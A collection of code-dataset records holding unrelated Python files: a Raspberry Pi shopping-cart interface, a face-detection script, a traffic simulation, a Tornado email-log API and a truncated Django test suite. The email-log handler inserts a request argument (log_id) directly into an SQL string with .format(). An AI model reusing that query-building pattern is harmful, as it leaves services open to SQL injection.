#get keyboard input\r\n pygame.time.wait(50) \r\n if GPIO.input(ENTER) == 0:\r\n break\r\n pygame.event.pump() \r\n \r\n time.sleep(1)\r\n camera.capture('fat.jpg') \r\n im = image = open('fat.jpg', 'rb').read()\r\n payload = {'image': im}\r\n\r\n # Submit the request.\r\n r = requests.post(PyTorch_REST_API_URL, files=payload).json()\r\n\r\n # Ensure the request was successful.\r\n if r['success']:\r\n # Loop over the predictions and display them.\r\n for (i, result) in enumerate(r['predictions']):\r\n print('{}. {}: {:.4f}'.format(i + 1, result['label'],\r\n result['probability']))\r\n print(result['label'])\r\n # Otherwise, the request failed.\r\n else:\r\n print('Request failed')\r\n \r\n mapping = ['computer', 'green bottle', 'corrector', 'nail clipper', 'medicine', 'mouse',\\\r\n 'soap', 'baseball', 'book', 'blue bottle', 'glove', 'chopping board', 'white scissor',\\\r\n 'pillow', 'apple juice', 'umbrella', 'tea pot', 'shampoo', 'dinasour', 'pooh', 'hat']\r\n string = mapping[int(result['label'])]\r\n string2 = \"select * FROM Item WHERE(Item_Name='\"+string+\"');\"\r\n cursor.execute(string2)\r\n item_now = cursor.fetchone()\r\n print(item_now)\r\n Info()\r\n \r\ndef Pos():\r\n global my_pos, Mystate, windowSurface\r\n with PiCamera() as camera:\r\n camera.start_preview()\r\n \r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface.\r\n pygame.display.update()\r\n pygame.event.pump()\r\n \r\n while True:\r\n #get keyboard input\r\n pygame.time.wait(50) \r\n if GPIO.input(ENTER) == 0:\r\n break\r\n pygame.event.pump() \r\n \r\n time.sleep(1)\r\n camera.capture('fat.jpg') \r\n im = image = open('fat.jpg', 'rb').read()\r\n payload = {'image': im}\r\n\r\n # Submit the request.\r\n r = requests.post(PyTorch_REST_API_URL, files=payload).json()\r\n\r\n # Ensure the request was successful.\r\n if r['success']:\r\n # Loop over the predictions and display them.\r\n for (i, result) in enumerate(r['predictions']):\r\n print('{}. {}: {:.4f}'.format(i + 1, result['label'],\r\n result['probability']))\r\n print(result['label'])\r\n # Otherwise, the request failed.\r\n else:\r\n print('Request failed')\r\n \r\n mapping = ['computer', 'green bottle', 'corrector', 'nail clipper', 'medicine', 'mouse',\\\r\n 'soap', 'baseball', 'book', 'blue bottle', 'glove', 'chopping board', 'white scissor',\\\r\n 'pillow', 'apple juice', 'umbrella', 'tea pot', 'shampoo', 'dinasour', 'pooh', 'hat']\r\n string = mapping[int(result['label'])]\r\n string2 = \"select * FROM Item WHERE(Item_Name='\"+string+\"');\"\r\n cursor.execute(string2)\r\n item_new = cursor.fetchone()\r\n my_pos = [item_new[6], item_new[7]]\r\n Map()\r\n\r\ndef Info():\r\n #Info page: can go to map, addcar, scan, home items\r\n\r\n global Mystate, windowSurface, item_now, item_list, total\r\n # some definition\r\n Info_state = {'HOME': 0, 'MAP': 1, 'SCAN': 2, 'CAR': 3}\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface.\r\n #get image first\r\n item_url = item_now[4]\r\n item_str = urlopen(item_url).read()\r\n item_file = io.BytesIO(item_str)\r\n image = pygame.image.load(item_file)\r\n while True:\r\n #get keyboard input\r\n if GPIO.input(ENTER) == 0:\r\n if Mystate == Info_state['HOME']:\r\n Home()\r\n elif Mystate == Info_state['MAP']:\r\n Map()\r\n elif Mystate == Info_state['SCAN']:\r\n Scan()\r\n elif Mystate == Info_state['CAR']:\r\n if item_list[0][2] == 0:\r\n item_list[0] = [item_now[0], item_now[1], 1]\r\n else:\r\n item_list[0][2]+=1\r\n total += item_now[1]\r\n Car()\r\n elif GPIO.input(SWITCH) == 0:\r\n Mystate = (Mystate+1)%4\r\n\r\n #init items\r\n background = info_bg\r\n home_icon = home_true if Mystate == Info_state['HOME'] else home_false\r\n map_icon = map_true if Mystate == Info_state['MAP'] else map_false\r\n scan_icon = scan_true if Mystate == Info_state['SCAN'] else scan_false\r\n car_icon = addcar_true if Mystate == Info_state['CAR'] else addcar_false\r\n font = pygame.font.SysFont(\"arial\", 30)\r\n if Mystate == Info_state['HOME']:\r\n text = font.render(\"Home\", True, (50,50,50))\r\n elif Mystate == Info_state['MAP']:\r\n text = font.render(\"search location\", True, (50,50,50))\r\n elif Mystate == Info_state['SCAN']:\r\n text = font.render(\"scan again\", True, (50,50,50))\r\n elif Mystate == Info_state['CAR']:\r\n text = font.render(\"add to cart\", True, (50,50,50))\r\n #put data to surface\r\n name = font.render(\"Name: \" + item_now[0], True, (0, 0, 255))\r\n price = font.render(\"Price: \" + str(item_now[1]), True, (0,0,255))\r\n remain = font.render(\"Remain: \"+ str(item_now[2]), True, (0,0,225))\r\n number = font.render(\"buying number in last week: \" + str(item_now[3]), True, (0,0,225))\r\n \r\n # build surface\r\n windowSurface.blit(background, (0, 0))\r\n windowSurface.blit(home_icon, (200, 500))\r\n windowSurface.blit(map_icon, (300, 500))\r\n windowSurface.blit(scan_icon, (400, 500))\r\n windowSurface.blit(car_icon, (500, 500))\r\n windowSurface.blit(text, (600, 500))\r\n windowSurface.blit(name, (450, 150))\r\n windowSurface.blit(price, (450, 200))\r\n windowSurface.blit(remain, (450, 250))\r\n windowSurface.blit(number, (450, 300))\r\n windowSurface.blit(image, (0, 150)) \r\n pygame.display.update()\r\n pygame.event.pump()\r\n\r\ndef Car():\r\n #Car page: can only go to home\r\n\r\n global Mystate, windowSurface, total, item_now, item_list\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface\r\n while True:\r\n #get keyboard inputs\r\n pygame.time.wait(200)\r\n if GPIO.input(ENTER) == 0:\r\n Home()\r\n #init items\r\n background = car_bg\r\n home_icon = home_true \r\n font = pygame.font.SysFont(\"arial\", 30)\r\n text = font.render(\"Home\", True, (0,0,255))\r\n \r\n \r\n # build surface\r\n windowSurface.blit(background, (0, 0))\r\n windowSurface.blit(home_icon, (200, 500))\r\n windowSurface.blit(text, (400, 500))\r\n if total != 0:\r\n string = 'Name: number: price:'\r\n str1 = font.render(string, True, (50, 50, 50))\r\n windowSurface.blit(str1, (200, 150))\r\n count = 0\r\n for i in range(21):\r\n count+=1\r\n if item_list[i][2] != 0:\r\n string = item_list[i][0] + ' ' + str(item_list[i][2]) + ' ' + str(item_list[i][1]*item_list[i][2])\r\n str1 = font.render(string, True, (50,50,50))\r\n windowSurface.blit(str1, (200, 150+count*50))\r\n pygame.display.update()\r\n pygame.event.pump()\r\n\r\ndef Cab():\r\n #cab page: \r\n global Mystate, windowSurface\r\n\r\n Mystate = 0 #reset mystate\r\n windowSurface = pygame.display.set_mode((WIDTH, HEIGHT)) #reset surface\r\n while True:\r\n pygame.time.wait(100)\r\n if GPIO.input(ENTER) == 0:\r\n Map()\r\n background = cab1_bg\r\n map_icon = map_true\r\n font = pygame.font.SysFont(\"arial\", 30)\r\n text = font.render(\"back to map\", True, (50, 50, 50))\r\n # build surface\r\n windowSurface.blit(background, (0, 0))\r\n windowSurface.blit(map_icon, (200, 500))\r\n windowSurface.blit(text, (400, 500))\r\n pygame.display.update()\r\n pygame.event.pump()\r\n\r\n\r\n\r\n\r\npygame.init()\r\nwindowSurface = pygame.display.set_mode((WIDTH, HEIGHT))\r\nHome()\r\n","sub_path":"Smart_cart/shop_old_1.py","file_name":"shop_old_1.py","file_ext":"py","file_size_in_byte":16184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"38258298","text":"import json\nimport os.path\nimport sys\n\n\ndef load_data(filepath):\n with open(filepath, 'rb') as file:\n return json.loads(file.read())\n\n\ndef pretty_print_json(decoded_json):\n return json.dumps(\n decoded_json,\n sort_keys=True,\n indent=4,\n ensure_ascii=False,\n )\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n exit('need filename')\n user_filepath = sys.argv[1]\n if not os.path.exists(user_filepath):\n exit('need correct file path')\n loaded_json = load_data(user_filepath)\n if not loaded_json:\n exit('can not load the json')\n print(pretty_print_json(loaded_json))\n","sub_path":"pprint_json.py","file_name":"pprint_json.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48204859","text":"import cv2\nimport numpy as np\npic=cv2.imread('E:\\\\pycharm_object\\\\tensorflow_opencv\\\\nba_test.jpg')\n#人脸数据,级联分类器,给人脸特征数据,返回可以识别人脸的对象\ndetector=cv2.CascadeClassifier('E:\\\\pycharm_object\\\\tensorflow_opencv\\\\face_detection.xml')\n#转换成灰度\ngray=cv2.cvtColor(pic,code=cv2.COLOR_BGR2GRAY)\n#使用训练好的识别人脸对象来识别人脸区域\n#后两个参数就是默认值,可以修改来调整识别人脸的精确度\nface_zone=detector.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=3)\nfor x,y,w,h in face_zone:\n #在人脸上画一个正方形,画正方形只需要知道左上角和右下角坐标即可\n cv2.rectangle(pic,pt1=(x,y),pt2=(x+w,y+h),color=[0,255,0],thickness=2)\n #在人脸上画圈,需要圆的圆心坐标和半径\n cv2.circle(pic,center=(x+w//2,y+h//2),radius=w//2,color=[0,0,255],thickness=2)\n\n#使用灰度图检测,绘制在彩色图片上\ncv2.imshow('pic',pic)\ncv2.imwrite('./nba_test_face_detection_result.jpg',pic)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"test_opencv/face_detection_test.py","file_name":"face_detection_test.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"330539249","text":"from __future__ import division\r\nimport sys,datetime,time,pygal,os\r\nfrom random import random\r\nfrom hashlib import md5\r\n\r\ndef try_float(x):\r\n try:\r\n return float(x)\r\n except:\r\n return x\r\n\r\ndef now():\r\n return datetime.datetime.today()\r\n\r\ndef new_id():hasher = md5(); hasher.update(str(now())); return hasher.hexdigest()\r\n\r\nSIM_TIME, SIM_NODES, SIM_TITLE = map(try_float,sys.argv[1:])\r\n\r\nglobal ROUTES, VALVES, CARS, here, slash\r\n\r\nROUTES = []; VALVES = []; CARS = []\r\n\r\nhere = os.getcwd()\r\nif \"\\\\\" in here:\r\n slash=\"\\\\\"\r\nelse:\r\n slash=\"/\"\r\nhere+=slash\r\n\r\ndef divider(t,nodes):\r\n div = t/nodes; return [node*div for node in xrange(int(nodes))]\r\n\r\ndef compute_nodes(route):\r\n # a route is a quartic curve\r\n return [{\"x\":t,\"y\":route.a*(t**4)+route.b*(t**3)+route.c*(t**2)+route.d*t+route.e} for t in divider(SIM_TIME,SIM_NODES)]\r\n\r\ndef from_collection(collection,id):return [x for x in collection if x.id == id][0]\r\n\r\ndef UPDATE_ROUTES(id,curr_obj):\r\n global ROUTES\r\n ROUTES[[ROUTES.index(route) for route in ROUTES if route.id == id][0]] = curr_obj\r\n return None\r\n\r\ndef UPDATE_VALVES(id,curr_obj):\r\n global VALVES\r\n VALVES[[VALVES.index(valve) for valve in VALVES if valve.id == id][0]] = curr_obj\r\n return None\r\n\r\ndef UPDATE_CARS(id,curr_obj):\r\n global CARS\r\n CARS[[CARS.index(car) for car in CARS if car.id == id][0]] = curr_obj\r\n return None\r\n\r\ndef toggle_valve(id):\r\n valve = from_collection(VALVES,id)\r\n valve.open = not valve.open\r\n UPDATE_VALVES(id,valve)\r\n\r\ndef NewRouteChart(route_index,gen):\r\n xy_chart = pygal.XY(show_y_labels=False,show_x_labels=False)\r\n xy_chart.title = SIM_TITLE\r\n route = ROUTES[route_index]; car_positions = []\r\n for car_id in route.cars:\r\n car = from_collection(CARS,car_id)\r\n node = route.nodes[car.node]\r\n car_positions.append((node[\"x\"],node[\"y\"]))\r\n xy_chart.add('Cars', car_positions)\r\n xy_chart.render_to_file(here+\"static%s%s.svg\"%(slash,gen))\r\n\r\nclass Route:\r\n def __init__(self,a,b,c,d,e):\r\n global ROUTES\r\n self.a = a; self.b = b; self.c = c; self.d = d; self.e = e\r\n self.id = new_id()\r\n self.nodes = compute_nodes(self)\r\n self.valves = []\r\n self.valve_nodes = []\r\n self.cars = []\r\n ROUTES.append(self)\r\n\r\n# Add Routes to the Environment\r\nRoute(0.008,0.002,0.029,-0.05,-0.012) # Route 1\r\nRoute(0.028,0.002,-0.029,-0.05,0.012) # Route 2\r\nRoute(0.108,-0.052,-0.129,-0.035,-0.012) # Route 3\r\n\r\ndef random_selection(array):return array[int(random()*len(array))]\r\n\r\ndef select_route():return random_selection(ROUTES)\r\n\r\nclass Valve:\r\n def __init__(self,node):\r\n global VALVES\r\n self.node = node\r\n self.id = new_id()\r\n success = False\r\n # bind valve to route\r\n while not success:\r\n self.route = select_route()\r\n if self.id not in self.route.valves and self.node not in self.route.valve_nodes:\r\n self.route.valves.append(self.id)\r\n self.route.valve_nodes.append(self.node)\r\n success = True\r\n time.sleep(0.1)\r\n UPDATE_ROUTES(self.route.id,self.route)\r\n # valve open or closed\r\n self.open = random_selection([True,False])\r\n VALVES.append(self)\r\n\r\n# Add Valves to the Environment\r\nfor valve in xrange(10):\r\n Valve(random_selection(xrange(int(SIM_NODES))))\r\n\r\nclass Car:\r\n def __init__(self):\r\n global CARS\r\n time.sleep(0.1)\r\n self.id = new_id()\r\n # bind car to route\r\n self.route = select_route()\r\n self.route.cars.append(self.id); UPDATE_ROUTES(self.route.id,self.route)\r\n # enter route at next free forward node\r\n self.node = len(CARS)+1\r\n if self.node in self.route.valve_nodes:\r\n self.node+=1\r\n CARS.append(self)\r\n def move(self):\r\n # CAR MOVEMENT FRAMEWORK\r\n # Search for cars at your intended next position on your route\r\n if [car for car in CARS if car.route.id == self.route.id and self.node+1 == car.node]:\r\n # do not advance\r\n pass\r\n else:\r\n # check if my next position is a traffic stop\r\n if self.node+1 in self.route.valve_nodes:\r\n # check if valve open\r\n valve_index = self.route.valve_nodes.index(self.node+1)\r\n valve_id = self.route.valves[valve_index]\r\n valve = from_collection(VALVES,valve_id)\r\n if valve.open:\r\n # skip over traffic node\r\n self.node+=2\r\n else:\r\n # stop at traffic light\r\n pass\r\n else:\r\n # move to next node\r\n self.node+=1\r\n\r\n# Add cars to the Environment\r\nfor car in xrange(100):\r\n Car()\r\n\r\ndef MoveCar(car):\r\n car.move(); UPDATE_CARS(car.id,car)\r\n\r\n# Simulation Framework\r\nfor time_step in xrange(int(SIM_NODES)):\r\n # toggle valves every 20 time_steps\r\n if time_step>0 and time_step%20 == 0:\r\n process = map(toggle_valve,[valve.id for valve in VALVES])\r\n # for every time step, attempt to move cars\r\n process = map(MoveCar,CARS)\r\n # plot route chart\r\n NewRouteChart(0,time_step)\r\n","sub_path":"traffic_game.py","file_name":"traffic_game.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578504480","text":"# -*- coding: UTF-8 -*-\nimport traceback\nfrom log.log import Log\nfrom tornado import gen\nfrom collector.BaseHandler import BaseHandler\nfrom util.sql_format import sql_format_select\nfrom util.DBConnectFactory import sync_pool\nfrom tornado.escape import json_encode, json_decode\nfrom setting.setting import ERROR_CODE\nfrom datetime import datetime\n\n\nclass EmailSendLogSearchHandler(BaseHandler):\n\n @gen.coroutine\n def get(self, *args, **kwargs):\n try:\n log = Log().get_logger(\"server\")\n log_id = self.get_arguments('log_id')\n if not log_id:\n log.error(\"the log_id is null\")\n return self.write(json_encode({\"code\": 500, \"status\": ERROR_CODE.get(500)}))\n sql = \"\"\"\n SELECT \n temp.temp_title,log.send_email,log.recv_email,log.send_time,log.annex_pwd,log.html_pwd\n FROM email_send_log as log\n LEFT JOIN email_template as temp\n ON log.temp_id=temp.temp_id\n WHERE log.log_id=\"{0}\"\n \"\"\".format(log_id[0])\n log.info(sql)\n except Exception:\n log.error(\"the get log detail is error\")\n log.error(log_id)\n log.error(traceback.format_exc())\n return self.write(json_encode({\"code\": 500, \"status\": ERROR_CODE.get(500)}))\n try:\n pool = sync_pool()\n with (yield pool.Connection()) as conn:\n with conn.cursor() as cursor:\n yield cursor.execute(sql)\n log_detail = cursor.fetchone()\n yield pool.close()\n except Exception:\n log.error(\"get log detail get connection is error\")\n log.error(traceback.format_exc())\n return self.write(json_encode({\"code\": 500, \"status\": ERROR_CODE.get(500)}))\n result = {}\n if log_detail:\n result = {\n \"temp_title\": log_detail[0] if log_detail[0] else None,\n \"send_email\": log_detail[1] if log_detail[1] else None,\n \"recv_email\": log_detail[2] if log_detail[2] else None,\n \"send_time\": log_detail[3].strftime(\"%Y-%m-%d %H:%M:%S\") if isinstance(log_detail[3], datetime) else\n log_detail[3],\n \"annex_pwd\": log_detail[4] if log_detail[4] else None,\n \"html_pwd\": log_detail[5] if log_detail[5] else None\n }\n return self.write(json_encode(result))\n\n @gen.coroutine\n def post(self, *args, **kwargs):\n # 开始, 截至 收件人 发件人 状态\n log = Log().get_logger(\"server\")\n try:\n email_paras_content = json_decode(self.request.body)\n log.info(\"EmailSendLogSearchHandler post is start\")\n log.info(json_encode(email_paras_content))\n log_id = email_paras_content.get('log_id', None)\n create_time = email_paras_content.get('create_time', None)\n end_time = email_paras_content.get('end_time', None)\n send_status = email_paras_content.get('send_status', None)\n send_email = email_paras_content.get('send_email', None)\n recv_email = email_paras_content.get('recv_email', None)\n current_page = int(email_paras_content.get(\"current_page\", 1))\n if current_page < 1:\n current_page = 1\n page_size = email_paras_content.get(\"page_size\", 30)\n begin = (current_page - 1) * page_size\n sql = sql_format_select(\"email_send_log\", begin=begin, end=page_size,\n big={\"create_time\": create_time} if create_time else None,\n less={\"create_time\": end_time} if end_time else None,\n order_by={\"create_time\": create_time} if create_time else None,\n log_id=log_id, send_status=send_status, send_email=send_email,\n recv_email=recv_email)\n\n log.info(sql)\n except Exception:\n log.error(\"the email send log query is error\")\n log.error(self.request.body)\n log.error(traceback.format_exc())\n return self.write(json_encode({\"code\": 500, \"status\": ERROR_CODE.get(500)}))\n try:\n pool = sync_pool()\n with (yield pool.Connection()) as conn:\n with conn.cursor() as cursor:\n yield cursor.execute(sql)\n datas = cursor.fetchall()\n sql = \"select count(*) from \" + sql.split('from')[-1].replace('\\n', '').split('LIMIT')[0].strip()\n log.info(\"the page query \" + sql)\n with (yield pool.Connection()) as conn:\n with conn.cursor() as cursor:\n yield cursor.execute(sql)\n counts = cursor.fetchone()\n yield pool.close()\n result = {\"email_send_log\": [], \"count\": counts}\n for i in datas:\n result[\"email_send_log\"].append(\n {\n \"log_id\": i[0] if i[0] else None,\n \"temp_id\": i[1] if i[1] else None,\n \"bat_id\": i[2] if i[2] else None,\n \"html_pwd\": i[3] if i[3] else None,\n \"annex_pwd\": i[4] if i[4] else None,\n \"send_email\": i[5] if i[5] else None,\n \"id_card\": i[6] if i[6] else None,\n \"user_name\": i[7] if i[7] else None,\n \"recv_email\": i[8] if i[8] else None,\n \"system\": i[9] if i[9] else None,\n \"create_time\": i[10].strftime(\"%Y-%m-%d %H:%M:%S\") if isinstance(i[10], datetime) else i[10],\n \"send_time\": i[11].strftime(\"%Y-%m-%d %H:%M:%S\") if isinstance(i[11], datetime) else i[11],\n \"send_status\": i[12],\n \"status_detail\": i[13] if i[13] else None,\n }\n )\n return self.write(json_encode(result))\n except Exception:\n log.error(\"the send log query is error\")\n log.error(self.request.body)\n log.error(traceback.format_exc())\n return self.write(json_encode({\"code\": 500, \"status\": ERROR_CODE.get(500)}))\n","sub_path":"collector/email_send_log_collector.py","file_name":"email_send_log_collector.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"163555866","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 12 17:02:54 2018\n\n@author: dhartig\n\"\"\"\n\nfrom lifelines import CoxPHFitter\nimport csv, pandas as pd, numpy as np\n\ntimes = []\nevents = []\nx1 = []\nx2 = []\n\nwith open(\"/opt/school/stat778/hw2/HW2_2018.dat\") as csvin: \n rdr = csv.reader(csvin, delimiter=' ')\n for time, flag, cov1, cov2 in rdr:\n times.append(float(time))\n events.append(int(flag))\n x1.append(float(cov1))\n x2.append(int(cov2))\n \ndf = pd.DataFrame({'time': times, 'censored': events, 'x1': x1, 'x2': x2})\n\ncph = CoxPHFitter()\ncph.fit(df, duration_col='time', event_col='censored')\ncph.print_summary()\nh = cph.predict_log_hazard_relative_to_mean(np.array([[0.5], [0.5]]))\nprint(cph._log_likelihood)\nprint(h)\n\n\n#kmf = KaplanMeierFitter()\n#kmf.fit(times, event_observed = events)\n\n#print(kmf.survival_function_)","sub_path":"hw2/logliketest.py","file_name":"logliketest.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"520038777","text":"# -*- coding: utf-8 -*-\nimport os\nimport shutil\n\nimport debug # pyflakes:ignore\n\nfrom pyquery import PyQuery\nfrom StringIO import StringIO\nfrom textwrap import wrap\n\nfrom django.conf import settings\nfrom django.urls import reverse as urlreverse\n\nfrom ietf.doc.factories import DocumentFactory, IndividualRfcFactory, WgRfcFactory\nfrom ietf.doc.models import ( Document, DocAlias, State, DocEvent,\n BallotPositionDocEvent, NewRevisionDocEvent, TelechatDocEvent, WriteupDocEvent )\nfrom ietf.doc.utils import create_ballot_if_not_open\nfrom ietf.doc.views_status_change import default_approval_text\nfrom ietf.group.models import Person\nfrom ietf.iesg.models import TelechatDate\nfrom ietf.utils.test_utils import TestCase, unicontent\nfrom ietf.utils.mail import outbox\nfrom ietf.utils.test_utils import login_testing_unauthorized\n\n\nclass StatusChangeTests(TestCase):\n def test_start_review(self):\n\n url = urlreverse('ietf.doc.views_status_change.start_rfc_status_change')\n login_testing_unauthorized(self, \"secretary\", url)\n\n # normal get should succeed and get a reasonable form\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('form select[name=create_in_state]')),1)\n\n ad_strpk = str(Person.objects.get(name='Areað Irector').pk)\n state_strpk = str(State.objects.get(slug='adrev',type__slug='statchg').pk) \n\n # faulty posts\n\n ## Must set a responsible AD\n r = self.client.post(url,dict(document_name=\"bogus\",title=\"Bogus Title\",ad=\"\",create_in_state=state_strpk,notify='ipu@ietf.org'))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n ## Must set a name\n r = self.client.post(url,dict(document_name=\"\",title=\"Bogus Title\",ad=ad_strpk,create_in_state=state_strpk,notify='ipu@ietf.org'))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n ## Must not choose a document name that already exists\n r = self.client.post(url,dict(document_name=\"imaginary-mid-review\",title=\"Bogus Title\",ad=ad_strpk,create_in_state=state_strpk,notify='ipu@ietf.org'))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n ## Must set a title\n r = self.client.post(url,dict(document_name=\"bogus\",title=\"\",ad=ad_strpk,create_in_state=state_strpk,notify='ipu@ietf.org'))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n # successful status change start\n r = self.client.post(url,dict(document_name=\"imaginary-new\",title=\"A new imaginary status change\",ad=ad_strpk,\n create_in_state=state_strpk,notify='ipu@ietf.org',new_relation_row_blah=\"rfc9999\",\n statchg_relation_row_blah=\"tois\"))\n self.assertEqual(r.status_code, 302)\n status_change = Document.objects.get(name='status-change-imaginary-new') \n self.assertEqual(status_change.get_state('statchg').slug,'adrev')\n self.assertEqual(status_change.rev,u'00')\n self.assertEqual(status_change.ad.name,u'Areað Irector')\n self.assertEqual(status_change.notify,u'ipu@ietf.org')\n self.assertTrue(status_change.relateddocument_set.filter(relationship__slug='tois',target__document__name='draft-ietf-random-thing'))\n\n def test_change_state(self):\n\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.change_state',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('form select[name=new_state]')),1)\n \n # faulty post\n r = self.client.post(url,dict(new_state=\"\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n # successful change to AD Review\n adrev_pk = str(State.objects.get(slug='adrev',type__slug='statchg').pk)\n r = self.client.post(url,dict(new_state=adrev_pk,comment='RDNK84ZD'))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.get_state('statchg').slug,'adrev')\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('RDNK84ZD'))\n self.assertFalse(doc.active_ballot())\n\n # successful change to Last Call Requested\n messages_before = len(outbox)\n doc.ad = Person.objects.get(user__username='ad')\n doc.save_with_history([DocEvent.objects.create(doc=doc, rev=doc.rev, type=\"changed_document\", by=Person.objects.get(user__username=\"secretary\"), desc=\"Test\")])\n lc_req_pk = str(State.objects.get(slug='lc-req',type__slug='statchg').pk)\n r = self.client.post(url,dict(new_state=lc_req_pk))\n self.assertEquals(r.status_code, 200)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEquals(doc.get_state('statchg').slug,'lc-req')\n self.assertEquals(len(outbox), messages_before + 1)\n self.assertTrue('Last Call:' in outbox[-1]['Subject'])\n\n # successful change to IESG Evaluation \n iesgeval_pk = str(State.objects.get(slug='iesgeval',type__slug='statchg').pk)\n r = self.client.post(url,dict(new_state=iesgeval_pk,comment='TGmZtEjt'))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.get_state('statchg').slug,'iesgeval')\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('TGmZtEjt'))\n self.assertTrue(doc.active_ballot())\n self.assertEqual(doc.latest_event(BallotPositionDocEvent, type=\"changed_ballot_position\").pos_id,'yes')\n\n def test_edit_notices(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_doc.edit_notify;status-change',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('form input[name=notify]')),1)\n self.assertEqual(doc.notify,q('form input[name=notify]')[0].value)\n\n # change notice list\n newlist = '\"Foo Bar\" '\n r = self.client.post(url,dict(notify=newlist,save_addresses=\"1\"))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.notify,newlist)\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('Notification list changed')) \n\n # Some additional setup so there's something to put in a generated notify list\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9999'),relationship_id='tois')\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9998'),relationship_id='tohist')\n\n # Ask the form to regenerate the list\n r = self.client.post(url,dict(regenerate_addresses=\"1\"))\n self.assertEqual(r.status_code,200)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n # Regenerate does not save!\n self.assertEqual(doc.notify,newlist)\n q = PyQuery(r.content)\n formlist = q('form input[name=notify]')[0].value\n self.assertEqual(None,formlist)\n\n def test_edit_title(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.edit_title',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEquals(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEquals(len(q('input[name=title]')),1)\n\n # change title\n r = self.client.post(url,dict(title='New title'))\n self.assertEquals(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEquals(doc.title,'New title')\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('Title changed')) \n\n def test_edit_ad(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.edit_ad',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('select[name=ad]')),1)\n\n # change ads\n ad2 = Person.objects.get(name='Ad No2')\n r = self.client.post(url,dict(ad=str(ad2.pk)))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.ad,ad2)\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('Shepherding AD changed')) \n\n def test_edit_telechat_date(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_doc.telechat_date;status-change',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('select[name=telechat_date]')),1)\n\n # set a date\n self.assertFalse(doc.latest_event(TelechatDocEvent, \"scheduled_for_telechat\"))\n telechat_date = TelechatDate.objects.active().order_by('date')[0].date\n r = self.client.post(url,dict(telechat_date=telechat_date.isoformat()))\n self.assertEqual(r.status_code,302)\n doc = 